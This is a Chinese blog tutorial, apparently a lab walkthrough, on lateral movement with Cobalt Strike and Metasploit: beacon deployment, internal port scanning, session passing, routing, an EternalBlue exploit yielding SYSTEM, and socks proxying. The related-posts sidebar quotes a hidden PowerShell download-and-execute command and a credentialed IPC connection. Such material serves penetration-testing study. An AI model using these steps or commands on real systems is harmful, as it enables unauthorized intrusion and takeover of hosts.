CS和MSF联动实现内网横向移动

最新推荐文章于 2024-04-14 16:57:32 发布
最新推荐文章于 2024-04-14 16:57:32 发布
阅读量1.4k 收藏 7
点赞数 1
文章标签: 系统安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuxinweii/article/details/120894996
版权

CS和MSF联动实现内网横向移动

**

实验要求:外网vps一台 cs服务器 msf工具 已经成功拿到shell**

一、使用cs生成EXE文件上传到目标主机直接上线

*1.先使用cs生成一个监听器来监听EXE连接回来的端口
主要配置payload类型和监听主机IP和端口

在这里插入图片描述
2.生成一个exe可执行文件
主要配置监听器和类型类型
在这里插入图片描述
3.将文件上传到目标直接执行

在这里插入图片描述
4.上线成功
在这里插入图片描述

二、扫描内网中的其他主机

1.使用cs的portcan模块来进行内网其他机器扫描
在这里插入图片描述
2.扫描完成后发现内网有很多主机,而这次的目标主机为192.168.1.123

在这里插入图片描述

三、将CS的会话传给MSF

1.先在MSF设置一个监听器
在这里插入图片描述2.配置好LPORT监听IP和LPORT监听端口
在这里插入图片描述
3.在CS上设置一个外监听器,将会话传给MSF

在这里插入图片描述4.直接选择spawan模块选择这个外监听器然后直接派生会话

在这里插入图片描述

四、进行内网横向移动

1、查看会话的版本是\86的版本,而目标机器版本为\64
在这里插入图片描述

在这里插入图片描述
2.如果目标主机版本和shell版本不相同最好将他们调整为统一版本,使用msf的post/windows/manage/archmigrate模块可以更改版本,这里只需要配置需要改变的会话,然后直接run
在这里插入图片描述
在这里插入图片描述
这里版本已经变成\64
3.添加一个内网路由,因为目标在内网中无法直接访问,但是可以通过这个会话来配置内网路由来进行访问内网
使用use post/multi/manage/autoroute 模块来进行配置
这里也只需要配置会话
在这里插入图片描述
在这里插入图片描述
已经可以正常访问内网

4.之前通过内网扫描时已经发现对方开启445端口,直接利用一波ms17_010看是否能直接打下来
这里是使用 exploit/windows/smb/ms17_010_eternalblue 模块,这个模块只需要对方有这个漏洞即可利用,但有几率使对方蓝屏
其他两个模块好像需要在某个通道相对稳定的情况下才能更好用
在这里插入图片描述
这里使用主动连接的payload
set payload windows/x64/shell/bind_tcp
在这里插入图片描述
5.配置好参数直接RUN
在这里插入图片描述
失败了,没关系,再来
再来一次直接成功,直接system权限

在这里插入图片描述
如果445端口一直失败,可以采用别的方法,比如从web页面入手
1.直接使用CS的socks server配置代理端口
在这里插入图片描述
2.可以在vps和浏览器上配置这个vps和端口即可,这里再火狐浏览器配置代理,毕竟要访问web页面配置好代理IP和端口以及代理类型
在这里插入图片描述
直接进行访问即可,成功访问到内网
在这里插入图片描述

不会RCE
关注
  • 1
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
cs在内横向的使用(靶机)
sweetie 的博客
11-02 1503
1.cs上线目标 (1)设置监听器 添加监听 (2) 上线目标 如果目标可以出外,我们可以使用让目标访问我们的cs服务器上的恶意代码,并下载执行,比较常见的就是使用如下图所使用的模块 根据目标的版本位数,选择是否要用 x64,点击执行后会出现如图所示窗口 复制代码(这里要选择x64的payload) powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http:///b'))"
【内安全】 横向移动&IPC&AT&SC命令&Impacket套件&CS插件&全自动
今天是几号的博客
03-25 1391
简单使用ms14-058提权后,得到sysytem权限。IPC是专用管道,可以实现对远程计算机的访问, 需要使用目标系统用户的账号密码,使用139、445端口。 1. 建立IPC链接到目标主机 2. 拷贝要执行的命令脚本到目标主机 3. 查看目标时间,创建计划任务(at、schtasks)定时执行拷贝到的脚本 4. 删除IPC链接 常用ipc命令总结 net use \\192.168.3.32\ipc$ "Admin12345" /user:god.org\administrator #新建连接 net
渗透-内环境下的横向移动总结
最新发布
lza20001103的博客
04-14 754
环境下的横向移动总结
使用csmsf进行内横向移动
qq_46635165的博客
10-10 4480
使用csmsf进行内横向移动 目标系统为 :192.168.1.123 , 跳板主机为:192.168.1.118 一,使用cs探测内 1, 将目标上线至CS 2, 使用cs探测内信息 查看当前目标系统络情况,确认目标系统所在内段 3, 使用cs的portscan功能对内进行扫描 portscan 192.168.1.115-192.168.1.125 22,80,445,3389 arp 1024 可以看到目标开放了3389,445,80端口; 二,内横向移动 对当前目标系统所获取
csmsf实现横向移动3
wuxinweii的博客
11-02 1576
注:上传通过哈希攻击拿到172.16.1.123的权限,也就是说成功跳转到172.16这个段,这次通过172.16.1.123拿到172.16.1.119的权限 一、通过172.16.1.123确定172.16.1.119为域控 因为是靶机,所以知道了172.16.1.119为域控 二、通过proxychain代理流量进内 因为vps无法直接访问到172.16.1.119,所以可以通过172.16.1.123生成一个代理端口来代理流量进入这个段 1.下载proxychain 参考文章:https://
渗透之横向移动rdp&winrm&winrs&spn&kerberos
m0_62207170的博客
04-24 746
渗透之横向移动rdp&winrm&winrs&spn&kerberos
Bt5+msf+ettercap内渗透
01-20
kali linux 内渗透视频教程,详细的操作过程和原理。
MSF11111
01-05
一些关于内的资料,自己搜集的,分享给大家
比较RationalUnifiedProcess(RUP)和MicrosoftSolutionsFramework(MSF)
03-03
火龙果软件工程技术中心 本文内容包括:RUP和MSF的定义第一印象:从MSF到RUP的高层的映射过程设想映射其他元素原则结束语致谢:注释参考文献:现在对本文进行讨论!参考资料本文来自于RationalEdge:...
msf渗透
10-29
msf渗透
渗透-横向移动外部工具的使用
lza20001103的博客
10-01 2188
横向移动外部工具的使用 前言 文章目录横向移动外部工具的使用前言psexecSmbexecWmiexecmsf模块cs模块 psexec 首先已经获得了一个主机的会话,通过横向移动获得另一个主机的会话 在已获得的shell中输入 net use \192.168.52.141 /user:administrator “密码” (1)psexec https://docs.microsoft.com/zh-cn/sysinternals/downloads/psexec psexec使用 建立IPC连接,无需
【内横移方法与实验】
一纸荒芜的博客
08-05 2214
横移技术
横向移动—IPC&AT&schtasks
剁椒鱼头没剁椒的博客
06-24 985
IPC( Internet Process Connection)共享“命名管道”的资源,是为了实现进程间通信而开放的命名管道。IPC可以通过验证用户名和密码获得相应的权限,通常在远程管理计算机和查看计算机的共享资源时使用。通过ipc$,可以与目标机器建立连接。利用这个连接,不仅可以访问目标机器中的文件,进行上传、下载等 操作,还可以在目标机器上运行其他命令,以获取目标机器的目录结构、用户列表等信息。
渗透之MSF&CS
weixin_54855337的博客
02-18 802
渗透,流量转发,隧道搭建
metasploit(MSF)渗透超细解说 -- 小黑渗透工具
G_WEB_Xie的博客
05-18 1839
metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!!初心: 记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有一些不足的地方大家可以指出来,我会在本博客中添加补充,也会将大家的名字备注在补充的章节内!!一起加油 ^-^本章出后后续会出实战测试,也会将win和linux常用命令做一期更新。
VulnStack超全面详细的渗透测试笔记
渗透测试研究中心
01-24 582
1. 根据卡获取的段信息,对win7所在段来一波存活主机检测,排除其他的之后目标锁定在主机号为128的主机上2. 对发现的存活主机来一波整体信息收集发现开了以下的端口,并且是一个域用户┌──(root????kali)-[/]└─# nmap -A 192.168.164.128 Starting Nmap 7.91 ( https://nmap.org ) at 2021-07...
记一次简单的内横向移动
qq_46635165的博客
10-26 1025
横向靶场 环境:10.0.3.143 跳板机win7 目标:桌面上的flag 172.16.15.138 win2008 172.16.15.141 win2003 2008 (172.16.15.138) 1,将跳板机10.0.3.143上线至cs,(将目标连接至VPS): 设置监听器: 使用cs web Delivery模块生成powershell payload: 将生成的payload放到跳板机上执行即可成功上线: 2,将cs的会话转入msf【方便漏洞利用】: cs上设置一个外联 ht
络安全】企业内中的横向移动
HBohan的博客
08-25 1427
横向移动,是攻击者侵入企业系统时,获取相关权限及重要数据的常见攻击手法。了解横向移动的原理有助于个人和企业更好地维护络安全。 中安星特此推出了横向移动科普系列,本系列共有三篇文章,我们会以简单轻松的话语为大家讲解横向移动的内容。 近年来,随着络攻击、勒索事件频发,企业安全防护需求迅速上升,传统安全防护中以密码和权限管理为核心的单一防护模式愈发不能满足目前的络安全环境。因而,深入了解攻击思路,“对症下药”,是目前络安全行业发展的重要方向。 本篇文章将就“横向移动”这一典型攻击行为进行简单阐述,从攻击
中的简单横向移动
Amire0x的小乐园
11-30 1608
横向移动 WMI 简介 全程Windows管理规范,从03开始一直存在 由一系列工具组成,可以在本地或者远程管理计算机系统 Windows默认不会讲WMI的操作记录在日志中 利用 条件 WMI服务开启,135端口,默认开启 防火墙允许135,445等端口通信 测试方法 nmap -p 135 ip telnet ip 135 ...... 管理员权限,及本地管理员组 wmic 用powershell联动cs wmic /node:<目标 ip> /user:<用户或域
msf和frp内穿透
08-19
msf和frp都是常用于内穿透的工具,可以帮助远程访问和控制内中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内服务暴露到公中,实现穿透。通过在内中启动Frp客户端,并在公服务器上启动Frp服务器端,你可以将内中的服务映射到公IP上,从而实现对内设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现穿透,让你可以方便地远程访问和控制内中的设备。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值